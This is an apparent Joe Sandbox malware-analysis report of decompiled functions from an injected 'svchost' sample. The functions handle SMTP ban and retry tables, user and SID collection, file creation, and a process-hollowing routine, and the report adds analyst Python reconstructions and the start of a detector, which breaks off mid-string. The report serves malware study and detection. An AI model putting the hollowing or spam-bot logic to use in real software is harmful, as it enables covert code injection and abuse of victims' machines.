                                                                                							__eflags = _t156;
                                                                                						} else {
                                                                                							_t156 = _t151 - 1;
                                                                                						}
                                                                                						goto L21;
                                                                                					} else {
                                                                                						_t156 = _t151 + _t101;
                                                                                						L21:
                                                                                						_t157[0x40] = _t156;
                                                                                						L22:
                                                                                						if(_t157[0x40] < 0) {
                                                                                							_t157[0x40] = _t157[0x40] & 0x00000000;
                                                                                						}
                                                                                						_t39 =  &(_t157[0x40]); // 0x74c33b57
                                                                                						_t163 = (0xc8 -  *_t39) * 0x14;
                                                                                						if(_t123 > 0x3e8) {
                                                                                							_a4 = 0x3e8;
                                                                                						}
                                                                                						asm("cdq");
                                                                                						_t46 =  &(_t157[0x14]); // 0x5f001320
                                                                                						_t47 =  &(_t157[0x10]); // 0x59be026a
                                                                                						asm("cdq");
                                                                                						_t49 =  &(_t157[0x30]); // 0xe4754f45
                                                                                						_t54 =  &(_t157[0x20]); // 0x406a0000
                                                                                						_t108 = E0012A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                						asm("cdq");
                                                                                						_t56 =  &(_t157[0x2c]); // 0xc68314c4
                                                                                						_t157[0x20] = _t108;
                                                                                						_t112 = E0012A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                						asm("cdq");
                                                                                						_t122 = 0;
                                                                                						_t157[0x58] = 0;
                                                                                						_t154 = _t112 / 0x3e8;
                                                                                						_t157[0x54] = GetTickCount();
                                                                                						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                						_t115 =  *_t68;
                                                                                						if(_t115 <= _t154) {
                                                                                							_t157[8] = _t115;
                                                                                							_t157[0x20] = _t115 * 0x3e8;
                                                                                						} else {
                                                                                							_t157[8] = _t154;
                                                                                							_t157[0x1c] = _t154 * 0x2710;
                                                                                						}
                                                                                						goto L31;
                                                                                					}
                                                                                				}
                                                                                			}

(Per-line instruction address column for this function, detached from the listing by extraction; the addresses run from 0x0012c2dc to 0x0012c4d5.)

                                                                                APIs
                                                                                  • Part of subcall function 0012A4C7: GetTickCount.KERNEL32 ref: 0012A4D1
                                                                                  • Part of subcall function 0012A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0012A4FA
                                                                                • GetTickCount.KERNEL32 ref: 0012C31F
                                                                                • GetTickCount.KERNEL32 ref: 0012C32B
                                                                                • GetTickCount.KERNEL32 ref: 0012C363
                                                                                • GetTickCount.KERNEL32 ref: 0012C378
                                                                                • GetTickCount.KERNEL32 ref: 0012C44D
                                                                                • InterlockedIncrement.KERNEL32(0012C4E4), ref: 0012C4AE
                                                                                • CreateThread.KERNEL32 ref: 0012C4C1
                                                                                • CloseHandle.KERNEL32(00000000,?,0012C4E0,00133588,00128810), ref: 0012C4CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                • String ID: localcfg
                                                                                • API String ID: 1553760989-1857712256
                                                                                • Opcode ID: 050ef491b0bad6c4b8eeaf3cdbe94e6bfdc5927521e70ebd57c3c438e3cecdcf
                                                                                • Instruction ID: 038b00f513d314fc066e8019e2ad9e6ea88f2420a0e4f2770f155de0b00861dc
                                                                                • Opcode Fuzzy Hash: 050ef491b0bad6c4b8eeaf3cdbe94e6bfdc5927521e70ebd57c3c438e3cecdcf
                                                                                • Instruction Fuzzy Hash: 89515AB1A00B518FC728DF69D59452ABBE9FB48300B509D2EE68BC7A90D774E8548B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

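The function E0012BE31 listed next rebuilds one of three string tables (selected by the entry name "smtp_herr", "smtp_ban" or "smtp_retr" at +4 of the entry, compared with lstrcmpiA) from the byte buffer at entry+0x24 with length at entry+0x18: a first loop counts lines, a second copies each line into its own allocation, strips a trailing 0x0d, and the old table is swapped out and freed; an action value of 3 clears the table instead. The following Python is an added analyst reconstruction of that logic, not code from the sample or from Joe Sandbox, written so the splitting rules can be checked against extracted buffers offline. The global addresses and the action value come from the listing; the function names, the LocalCfgStore class and the assumption that only those three names reach the table-select step (the branch cut off at the end of this section is not visible) are mine.

```python
# Added analyst reconstruction of the table update performed by E0012BE31.
# Not the sample's own code: it re-expresses the decompiled logic in Python.
# Constants are taken from the listing (globals at 0x133630/0x133634/0x133638,
# the "action == 3" clear case); function and class names are hypothetical.

from typing import Dict, List, Optional

# Table slot selected by entry name (lstrcmpiA in the native code, so the
# comparison is case-insensitive).
SLOTS: Dict[str, int] = {
    "smtp_herr": 0x133630,
    "smtp_ban": 0x133634,
    "smtp_retr": 0x133638,
}


def count_lines(blob: bytes) -> int:
    """First loop of E0012BE31: every 0x0a byte closes a line, and so does the
    final byte of the buffer even when it is not a newline."""
    n = len(blob)
    return sum(1 for i in range(n) if blob[i] == 0x0A or i == n - 1)


def split_lines(blob: bytes) -> List[bytes]:
    """Second loop of E0012BE31: copy each line into its own buffer without the
    newline, then blank one trailing 0x0d if the line is non-empty."""
    n = len(blob)
    lines: List[bytes] = []
    start = 0
    for i in range(n):
        ch = blob[i]
        if ch != 0x0A and i != n - 1:
            continue
        seg_len = i - start
        if ch != 0x0A:            # final byte with no newline belongs to the line
            seg_len += 1
        seg = blob[start:start + seg_len]
        if seg_len > 0 and seg[-1] == 0x0D:
            seg = seg[:-1]        # CRLF input: the CR is overwritten with NUL
        lines.append(seg)
        start += seg_len + 1      # skip the separator (_v8 = _v8 + len + 1)
    return lines


class LocalCfgStore:
    """Stand-in for the three pointer-array globals the native code swaps."""

    def __init__(self) -> None:
        self.tables: Dict[str, Optional[List[bytes]]] = {k: None for k in SLOTS}

    def update(self, name: str, blob: bytes, action: int) -> Optional[List[bytes]]:
        """Replace one table the way E0012BE31 does and return the previous one
        (the native code frees the old strings and array at that point).
        action == 3 clears the table; a buffer with no lines also stores NULL."""
        key = name.lower()
        if key not in SLOTS:
            raise ValueError(f"unhandled config entry {name!r}")
        new: Optional[List[bytes]] = None
        if action != 3:
            lines = split_lines(blob)
            # The native code sizes the pointer array from the first loop; the
            # two loops must agree on the line count.
            assert len(lines) == count_lines(blob)
            if lines:
                new = lines
        old = self.tables[key]
        self.tables[key] = new
        return old


if __name__ == "__main__":
    # Constructed sample buffer, not data taken from the report.
    store = LocalCfgStore()
    store.update("SMTP_BAN", b"550 blocked\r\n421 too many\n\nlast", 0)
    print(store.tables["smtp_ban"])  # [b'550 blocked', b'421 too many', b'', b'last']
```

Two details worth keeping in mind when comparing against memory dumps: an empty line between two newlines still produces a one-byte (empty) string, and a buffer ending without a newline still contributes its last line, so the table length equals the number of 0x0a bytes plus one unless the buffer ends in 0x0a.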
                                                                                C-Code - Quality: 98%
                                                                                			E0012BE31(signed int _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				CHAR* _v12;
                                                                                				int _v16;
                                                                                				int _t50;
                                                                                				int _t51;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t57;
                                                                                				void* _t59;
                                                                                				char* _t66;
                                                                                				CHAR* _t68;
                                                                                				int _t71;
                                                                                				int _t72;
                                                                                				void* _t76;
                                                                                				intOrPtr _t78;
                                                                                				signed int _t82;
                                                                                				signed int _t83;
                                                                                				signed int _t84;
                                                                                				intOrPtr* _t86;
                                                                                				void* _t88;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                
                                                                                				_t83 = _a4;
                                                                                				_t68 = _t83 + 4;
                                                                                				_v12 = _t68;
                                                                                				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
                                                                                					L3:
                                                                                					_t72 = 0;
                                                                                					_v16 = 0;
                                                                                					if(_a8 == 3) {
                                                                                						L25:
                                                                                						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
                                                                                							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
                                                                                								_t50 = lstrcmpiA(_v12, "smtp_retr");
                                                                                								_t51 = 0x133638;
                                                                                								if(_t50 != 0) {
                                                                                									_t51 = _a4;
                                                                                								}
                                                                                							} else {
                                                                                								_t51 = 0x133634;
                                                                                							}
                                                                                						} else {
                                                                                							_t51 = 0x133630;
                                                                                						}
                                                                                						_t86 =  *_t51;
                                                                                						 *_t51 = _v16;
                                                                                						if(_t86 == 0) {
                                                                                							goto L36;
                                                                                						} else {
                                                                                							_t52 =  *_t86;
                                                                                							_t84 = 0;
                                                                                							while(_t52 != 0) {
                                                                                								E0012EC2E(_t52);
                                                                                								_t84 = _t84 + 1;
                                                                                								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
                                                                                							}
                                                                                							return E0012EC2E(_t86);
                                                                                						}
                                                                                					}
                                                                                					_t55 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                					_t82 = 0;
                                                                                					if(_t55 <= 0) {
                                                                                						goto L25;
                                                                                					} else {
                                                                                						goto L5;
                                                                                					}
                                                                                					do {
                                                                                						L5:
                                                                                						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
                                                                                							_t82 = _t82 + 1;
                                                                                						}
                                                                                						_t72 = _t72 + 1;
                                                                                					} while (_t72 < _t55);
                                                                                					if(_t82 == 0) {
                                                                                						goto L25;
                                                                                					}
                                                                                					_t70 = 4 + _t82 * 4;
                                                                                					_t51 = E0012EBCC(4 + _t82 * 4);
                                                                                					_pop(_t76);
                                                                                					_v16 = _t51;
                                                                                					if(_t51 == 0) {
                                                                                						goto L36;
                                                                                					}
                                                                                					E0012EE2A(_t76, _t51, 0, _t70);
                                                                                					_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                					_a4 = _a4 & 0x00000000;
                                                                                					_t92 = _t91 + 0xc;
                                                                                					if(_t57 > 0) {
                                                                                						_t71 = _v16;
                                                                                						do {
                                                                                							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
                                                                                							if(_t78 == 0xa || _a4 == _t57 - 1) {
                                                                                								_t88 = _a4 - _v8;
                                                                                								if(_t78 != 0xa) {
                                                                                									_t88 = _t88 + 1;
                                                                                								}
                                                                                								_t25 = _t88 + 1; // 0x1
                                                                                								_t59 = E0012EBCC(_t25);
                                                                                								 *_t71 = _t59;
                                                                                								if(_t59 == 0) {
                                                                                									goto L25;
                                                                                								} else {
                                                                                									E0012EE08(_t59, _t83 + _v8 + 0x24, _t88);
                                                                                									_t92 = _t92 + 0xc;
                                                                                									 *((char*)(_t88 +  *_t71)) = 0;
                                                                                									if(_t88 > 0) {
                                                                                										_t31 =  *_t71 - 1; // -1
                                                                                										_t66 = _t88 + _t31;
                                                                                										if( *_t66 == 0xd) {
                                                                                											 *_t66 = 0;
                                                                                										}
                                                                                									}
                                                                                									_t71 = _t71 + 4;
                                                                                									_v8 = _v8 + _t88 + 1;
                                                                                									goto L22;
                                                                                								}
                                                                                							}
                                                                                							L22:
                                                                                							_a4 = _a4 + 1;
                                                                                							_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                						} while (_a4 < _t57);
                                                                                					}
                                                                                					goto L25;
                                                                                				} else {
                                                                                					_t51 = lstrcmpiA(_t68, "smtp_retr");
                                                                                					if(_t51 != 0) {
                                                                                						L36:
                                                                                						return _t51;
                                                                                					}
                                                                                					goto L3;
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0012BE4F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0012BE5B
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0012BE67
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0012BF6A
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0012BF7F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0012BF94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                • API String ID: 1586166983-1625972887
                                                                                • Opcode ID: bb7acc1129f97147c97d601a241644b91ab4c546cde4f99e695c653dc5976291
                                                                                • Instruction ID: 96d0f6dc692c5f58cc0450054e26b444925ec9e92b52fa21b68cb4df356b169d
                                                                                • Opcode Fuzzy Hash: bb7acc1129f97147c97d601a241644b91ab4c546cde4f99e695c653dc5976291
                                                                                • Instruction Fuzzy Hash: E851D471A0832AEFDB15CF64EEC0BAABBE9AF14344F054055E941AB251D730EDA0CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00126A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				void* _v12;
                                                                                				long _v16;
                                                                                				long _v20;
                                                                                				long _v24;
                                                                                				intOrPtr _v28;
                                                                                				long _v32;
                                                                                				void* _t31;
                                                                                				intOrPtr _t43;
                                                                                				int _t44;
                                                                                				void* _t53;
                                                                                				int _t59;
                                                                                				CHAR* _t68;
                                                                                				void* _t69;
                                                                                				int _t73;
                                                                                
                                                                                				_t59 = __edx;
                                                                                				_t68 = _a4;
                                                                                				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                				_v12 = _t31;
                                                                                				if(_t31 == 0xffffffff) {
                                                                                					 *0x132180 = 0x61040101;
                                                                                					 *0x13217c = GetLastError();
                                                                                					__eflags = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				_v8 =  *_t68;
                                                                                				_v7 = _t68[1];
                                                                                				_t63 = _a12;
                                                                                				_v6 = _t68[2];
                                                                                				_v5 = 0;
                                                                                				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
                                                                                					L10:
                                                                                					_t43 = E00126987(0x500000, _v12, _a8, _a12, _t63);
                                                                                					_v28 = _t43;
                                                                                					if(_t43 != 0) {
                                                                                						_t44 = CloseHandle(_v12);
                                                                                						__eflags = _t44;
                                                                                						if(_t44 != 0) {
                                                                                							L15:
                                                                                							return _v28;
                                                                                						}
                                                                                						 *0x132180 = 0x61040103;
                                                                                						 *0x13217c = GetLastError();
                                                                                						CloseHandle(_v12);
                                                                                						L14:
                                                                                						DeleteFileA(_t68);
                                                                                						goto L15;
                                                                                					}
                                                                                					 *0x132180 = 0x61040102;
                                                                                					 *0x13217c = GetLastError();
                                                                                					CloseHandle(_v12);
                                                                                					goto L14;
                                                                                				}
                                                                                				_t53 = E0012EB0E(_v20 * _v24, 0, _v16, 0);
                                                                                				_t69 = _t69 + 0x10;
                                                                                				_t73 = _t59;
                                                                                				if(_t73 < 0) {
                                                                                					goto L10;
                                                                                				}
                                                                                				if(_t73 > 0 || _t53 > 0x6400000) {
                                                                                					_t22 = E0012ECA5() % 0x500000 + 0xa00000; // 0xa00000
                                                                                					_t63 = _t22;
                                                                                					goto L10;
                                                                                				} else {
                                                                                					__eflags = _t59;
                                                                                					if(__eflags < 0) {
                                                                                						goto L10;
                                                                                					}
                                                                                					if(__eflags > 0) {
                                                                                						L9:
                                                                                						_t63 = (E0012ECA5() & 0x001fffff) + 0x300000;
                                                                                						__eflags = (E0012ECA5() & 0x001fffff) + 0x300000;
                                                                                						goto L10;
                                                                                					}
                                                                                					__eflags = _t53 - 0x3200000;
                                                                                					if(_t53 <= 0x3200000) {
                                                                                						goto L10;
                                                                                					}
                                                                                					goto L9;
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126A7D
                                                                                • GetDiskFreeSpaceA.KERNEL32(00129E9D,00129A60,?,?,?,001322F8,?,?,?,00129A60,?,?,00129E9D), ref: 00126ABB
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B4E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B5F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B6F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B7D
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B80
                                                                                • GetLastError.KERNEL32(?,?,?,00129A60,?,?,00129E9D,?,?,?,?,?,00129E9D,?,00000022,?), ref: 00126B96
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 3188212458-0
                                                                                • Opcode ID: daf6007789c53ba79547616e50a8f4fdf48d8187a967a2f091540df1026cd9ca
                                                                                • Instruction ID: 2964fee6bfff7d439d966c14a182d76e6bcc4aaf9f3c1c740bfdd8a0ed9a1af7
                                                                                • Opcode Fuzzy Hash: daf6007789c53ba79547616e50a8f4fdf48d8187a967a2f091540df1026cd9ca
                                                                                • Instruction Fuzzy Hash: 1A31E372A0021DFFDF01AFA4AD85BDE7FB9EB58340F144066F251E7691D73099A48B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00126F5F(long _a4, long _a8) {
                                                                                				void* _v8;
                                                                                				long _v12;
                                                                                				union _SID_NAME_USE _v16;
                                                                                				void _v84;
                                                                                				char _v212;
                                                                                				CHAR* _t36;
                                                                                				void* _t53;
                                                                                				intOrPtr* _t54;
                                                                                				char _t62;
                                                                                				void* _t65;
                                                                                				char* _t66;
                                                                                				intOrPtr _t67;
                                                                                				CHAR* _t68;
                                                                                				void* _t69;
                                                                                
                                                                                				_t68 = _a4;
                                                                                				 *_t68 = 0;
                                                                                				if(GetUserNameA(_t68,  &_a8) == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_t36 = _t68;
                                                                                				_t66 =  &(_t36[1]);
                                                                                				do {
                                                                                					_t62 =  *_t36;
                                                                                					_t36 =  &(_t36[1]);
                                                                                				} while (_t62 != 0);
                                                                                				_a8 = _t36 - _t66;
                                                                                				_a4 = 0x7c;
                                                                                				_v12 = 0x80;
                                                                                				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
                                                                                					L8:
                                                                                					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00126EDD());
                                                                                					return _a8;
                                                                                				}
                                                                                				E0012EF00( &(_t68[_a8]), "/");
                                                                                				_a8 = _a8 + 1;
                                                                                				_push( &_v8);
                                                                                				_t53 =  &_v84;
                                                                                				_push(_t53);
                                                                                				L0012F4AA();
                                                                                				if(_t53 == 0) {
                                                                                					goto L8;
                                                                                				}
                                                                                				_t54 = _v8;
                                                                                				_t20 = _t54 + 1; // 0x121
                                                                                				_t65 = _t20;
                                                                                				do {
                                                                                					_t67 =  *_t54;
                                                                                					_t54 = _t54 + 1;
                                                                                				} while (_t67 != 0);
                                                                                				_a4 = _t54 - _t65;
                                                                                				E0012EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
                                                                                				_a8 = _a8 + _a4;
                                                                                				_t69 = _t69 + 0xc;
                                                                                				LocalFree(_v8);
                                                                                				goto L8;
                                                                                			}

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,0012D7C3), ref: 00126F7A
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0012D7C3), ref: 00126FC1
                                                                                • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00126FE8
                                                                                • LocalFree.KERNEL32(00000120), ref: 0012701F
                                                                                • wsprintfA.USER32 ref: 00127036
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                • String ID: /%d$|
                                                                                • API String ID: 676856371-4124749705
                                                                                • Opcode ID: e02feb10db97addcd6e87918c87d3959e113511c9435229cdf937142795f77a0
                                                                                • Instruction ID: 0ab1af1c551a18215732e9f813c318bc05b0cc57ce1f34e291fe9bb2ec58a168
                                                                                • Opcode Fuzzy Hash: e02feb10db97addcd6e87918c87d3959e113511c9435229cdf937142795f77a0
                                                                                • Instruction Fuzzy Hash: 4D313872900218ABDB01DFA8E859ADF7BFCEF09350F048066F819DB141EB34DA188B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E00126CC9(void* __ecx) {
                                                                                				_Unknown_base(*)()* _t8;
                                                                                				CHAR* _t17;
                                                                                				void* _t18;
                                                                                				void* _t23;
                                                                                				char _t25;
                                                                                				void* _t34;
                                                                                
                                                                                				_t23 = __ecx;
                                                                                				if( *0x132e08 != 0) {
                                                                                					L14:
                                                                                					return 0x132e08;
                                                                                				}
                                                                                				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
                                                                                				if(_t8 == 0) {
                                                                                					L4:
                                                                                					if(GetSystemDirectoryA(0x132e08, 0x104) == 0 ||  *0x132e08 == 0) {
                                                                                						if(GetWindowsDirectoryA(0x132e08, 0x104) == 0 ||  *0x132e08 == 0) {
                                                                                							E0012EF00(0x132e08, E00122544(0x1322f8, 0x130664, 0xb, 0xe4, 0xc8));
                                                                                							E0012EE2A(_t23, 0x1322f8, 0, 0x100);
                                                                                							_t34 = _t34 + 0x28;
                                                                                						}
                                                                                						E0012EF1E(0x132e08, E00122544(0x1322f8, 0x130658, 0xb, 0xe4, 0xc8));
                                                                                						E0012EE2A(_t23, 0x1322f8, 0, 0x100);
                                                                                					}
                                                                                					L10:
                                                                                					_t17 = 0x132e08;
                                                                                					goto L11;
                                                                                					L11:
                                                                                					_t25 =  *_t17;
                                                                                					_t17 =  &(_t17[1]);
                                                                                					if(_t25 != 0) {
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t18 = _t17 - 0x132e09;
                                                                                						if( *((char*)(_t18 + 0x132e07)) != 0x5c) {
                                                                                							 *((char*)(_t18 + 0x132e08)) = 0x5c;
                                                                                							 *((char*)(_t18 + 0x132e09)) = _t25;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                				_push(0x104);
                                                                                				_push(0x132e08);
                                                                                				if( *_t8() == 0 ||  *0x132e08 == 0) {
                                                                                					goto L4;
                                                                                				} else {
                                                                                					goto L10;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,001322F8,000000E4,00126DDC,000000C8), ref: 00126CE7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00126CEE
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00126D14
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00126D2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                • API String ID: 1082366364-3395550214
                                                                                • Opcode ID: eeaf994e8a8343ca6793c5de614262f03323676576d68076133baed8ffd64b03
                                                                                • Instruction ID: 1755face8c685d0f4009e8c1a7be4ab899859285ac36480fe5f78c596ff296f6
                                                                                • Opcode Fuzzy Hash: eeaf994e8a8343ca6793c5de614262f03323676576d68076133baed8ffd64b03
                                                                                • Instruction Fuzzy Hash: CD212B7174126C7EF72267327C9AFB72ECD8B66750F0C4094F484A60D1D7A988A5C2B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0012977C(void* __ecx, CHAR* _a4) {
                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                				void _v24;
                                                                                				char _v28;
                                                                                				struct _STARTUPINFOA _v96;
                                                                                				struct _CONTEXT _v812;
                                                                                				void* _t33;
                                                                                
                                                                                				_t46 = __ecx;
                                                                                				E0012EE2A(__ecx,  &_v96, 0, 0x44);
                                                                                				_v96.cb = 0x44;
                                                                                				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
                                                                                					E0012EE2A(_t46,  &_v812, 0, 0x2cc);
                                                                                					_v812.ContextFlags = 0x10002;
                                                                                					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
                                                                                						_t33 = E0012637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
                                                                                						_push(0);
                                                                                						if(_t33 == 0) {
                                                                                							L4:
                                                                                							TerminateProcess(_v20.hProcess, ??);
                                                                                							goto L1;
                                                                                						}
                                                                                						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_v812.Eax = _v28;
                                                                                						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						ResumeThread(_v20.hThread);
                                                                                						return 1;
                                                                                					}
                                                                                					L3:
                                                                                					_push(0);
                                                                                					goto L4;
                                                                                				}
                                                                                				L1:
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00129947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,001322F8), ref: 001297B1
                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,001322F8), ref: 001297EB
                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,001322F8), ref: 001297F9
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,001322F8), ref: 00129831
                                                                                • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,001322F8), ref: 0012984E
                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,001322F8), ref: 0012985B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: c07d1000873e769e9a919c037db3921ddcde7a6725ad8a71c7aefb1695757a1a
                                                                                • Instruction ID: 6592f071701bd0a412d43e18a92c65fd6061282944c05be721ad4f9de30f578b
                                                                                • Opcode Fuzzy Hash: c07d1000873e769e9a919c037db3921ddcde7a6725ad8a71c7aefb1695757a1a
                                                                                • Instruction Fuzzy Hash: EB21EB71901229BBDB229FA5EC49EEF7BBCEF09750F400061FA19E1150EB71DA54CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
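The API list above is the signature of process hollowing (RunPE): a child is created with dwCreationFlags 0x00000004 (CREATE_SUSPENDED), its thread context is read, four bytes are written into the suspended process, a context with 0x00010002 (CONTEXT_i386 | CONTEXT_INTEGER, the general-purpose register set a RunPE loader patches to redirect execution) is set, and the thread is resumed; TerminateProcess is the cleanup branch between GetThreadContext and the write. The following Python is an added example, not part of the report or of the sample: it parses lines in the report's "APIs" format, decodes the constants and flags the chain. The CreateFileA line in the sample is constructed from the arguments visible in the decompiled E00126BA7 further down (that call is not logged on this page); its ref value is the function's start address, not a logged call site.

```python
"""Decode the Win32 constants in Joe Sandbox 'APIs' lines and flag the
suspended-create / write / set-context / resume chain.

Added example, not part of the Joe Sandbox report or of the sample.  The lines in
SAMPLE_APIS are copied from the listing above, except the CreateFileA line, which
is constructed from the decompiled E00126BA7 arguments (ref = function start)."""
import re

API_LINE = re.compile(r"•?\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

SAMPLE_APIS = """
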